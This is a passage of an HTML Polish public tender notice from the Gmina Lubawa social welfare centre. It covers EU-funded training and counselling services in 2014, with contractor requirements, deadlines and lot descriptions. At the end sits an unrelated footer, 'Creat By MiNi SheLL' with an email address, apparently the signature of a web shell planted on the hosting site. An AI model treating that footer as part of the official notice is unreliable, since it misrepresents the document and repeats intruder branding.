Wykładowcy trenerzy biorący udział w realizacji zamówienia muszą posiadać wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych warsztatów, treningów, porad lub wykształcenie wyższe i specjalizację kierunkową zgodną z zakresem zajęć w ramach poszczególnych części zamówienia. 
W celu potwierdzenia spełnienia warunku o którym mowa w PKT. 9 pkt. 2 ppkt. 2.2 Wykaz osób potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami posiadającymi odpowiednie wykształcenie, doświadczenie niezbędne do realizacji szkoleń w ramach usług będących przedmiotem zamówienia wymagane jest aby wykładowcy trenerzy biorący udział w realizacji poszczególnych części przedmiotu zamówienia  posiadali  wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych warsztatów, treningów, porad lub wykształcenie wyższe i specjalizację lub inne  uprawniające do prowadzenia ww warsztatów, treningów,  porad oraz doświadczenie zawodowe przeprowadzili co najmniej 2 usługi treningi, warsztaty, poradnictwo, doradztwo odpowiadające swoim rodzajem usługom stanowiącym zakres poszczególnych części przedmiotu zamówienia. 
Wykaz osób należy przedstawić na druku stanowiącym Załącznik nr 5 do Specyfikacji Istotnych Warunków Zamówienia SIWZ wraz z kserokopią dyplomów lub innych dokumentów, poświadczających posiadanie przez osoby prowadzące warsztaty, treningi, poradnictwo, doradztwo  ww wykształcenia i doświadczenia.
W przypadku zlecania części zamówienia podwykonawcom oświadczenie w sprawie realizacji zamówienia przy współudziale podwykonawców stanowiące Załącznik nr 6 do Specyfikacji Istotnych Warunków Zamówienia SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest spełnienie warunków zawartych w niniejszym Specyfikacji Istotnych Warunków Zamówienia SIWZ oraz art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zwanej dalej ustawą Pzp. 
O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy
Znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy
Zmiany postanowień umowy mogą dotyczyć w szczególności
nazwy, adresu Wykonawcy oraz osób reprezentujących strony, 
terminów i szczegółowych harmonogramów realizacji poszczególnych zajęć, warsztatów, treningów, poradnictwa,
uczestników i uczestniczek form wsparcia,
zmiany których nie można było przewidzieć na etapie prowadzonego postępowania                         o udzielenie zamówienia publicznego, 
Zmiany postanowień niniejszej umowy mogą nastąpić za zgodą obu stron w formie pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopslubawa.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Gminy Lubawa, Fijewo 73, 14-260 Lubawa. pok. 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2014 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej Gminy Lubawa, Fijewo 73, 14-260 Lubawa. pok. 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Aktywna rodzina                                   
numer projektu POKL.07.01.01-28-066/08-00
Projekt systemowy współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
PO KL Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca
Trening interpersonalny (grupowy) - dla uczestników projektu  z Grupy I (14 osób) biorących udział  w ramach Kontraktów Socjalnych
Trening interpersonalny grupowy dla uczestników projektu  z Grupy II (11 osób) biorących udział  w ramach Kontraktów Socjalnych
Poradnictwo psychologiczne (indywidualne) dla uczestników projektu  z Grupy I (14 osób) biorących udziałw ramach Kontraktów Socjalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca
Trening interpersonalny (grupowy) dla uczestników projektu  z Grupy I (14 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji MARZEC  MAJ 2014r
Trening interpersonalny (grupowy) dla uczestników projektu z Grupy II  (11 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji MARZEC  MAJ 2014r
Poradnictwo psychologiczne (indywidualne) dla uczestników projektu  z Grupy I                   (14 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. 42 godz./grupa, a 3 godz./osoba (5 godz./m-nie w miesiącach: MARZEC - PAŹDZIERNIK/2014r. oraz 2 godz./m-nie w miesiącu LISTOPAD/2014r.)
Okres realizacji MARZEC LISTOPAD/2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca
Trening kompetencji rodzicielskich (grupowy)   dla uczestników projektu z Grupy I                   (14 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Warsztaty zarządzania budżetem domowym (grupowe) dla uczestników projektu z Grupy I (14 osób) biorących udział  w ramach Kontraktów Socjalnych
Warsztaty autoprezentacji (grupowe)  dla uczestników projektu z Grupy II (11 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca
Warsztaty kompetencji rodzicielskich (grupowe) dla uczestników projektu z Grupy I  (14 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji CZERWIEC  SIERPIEŃ/2014r
Warsztaty zarządzania budżetem domowym (grupowe) dla uczestników    projektu z Grupy I (14 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji LIPIEC - WRZESIEŃ/2014r.
Warsztaty autoprezentacji (grupowe) dla uczestników projektu z Grupy II   (11 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji CZERWIEC SIERPIEŃ/2014r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca
Warsztaty aktywizacji zawodowej (grupowe) dla uczestników projektu z Grupy I                     (14 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Warsztaty aktywizacji zawodowej (grupowe) dla uczestników projektu z Grupy II (11 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych Doradztwo zawodowe (indywidualne) dla uczestników projektu z Grupy II (11 osób) biorących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca
Warsztaty aktywizacji zawodowej (grupowe) dla uczestników projektu z Grupy I               (14 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji WRZESIEŃ  LISTOPAD/2014r
Warsztaty aktywizacji zawodowej (grupowe) - dla uczestników projektu z Grupy II  (11 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji WRZESIEŃ LISTOPAD/2014r
Doradztwo zawodowe (indywidualne) dla uczestników projektu z Grupy II (11 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. 33 godz./grupa, a 3 godz./osoba (4 godz./m-nie w miesiącach MARZEC SIERPIEŃ/2014r. oraz 3 godz./m-nie  w miesiącach WRZESIEŃ LISTOPAD/2014r.)
Okres realizacji MARZEC LISTOPAD/2014r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com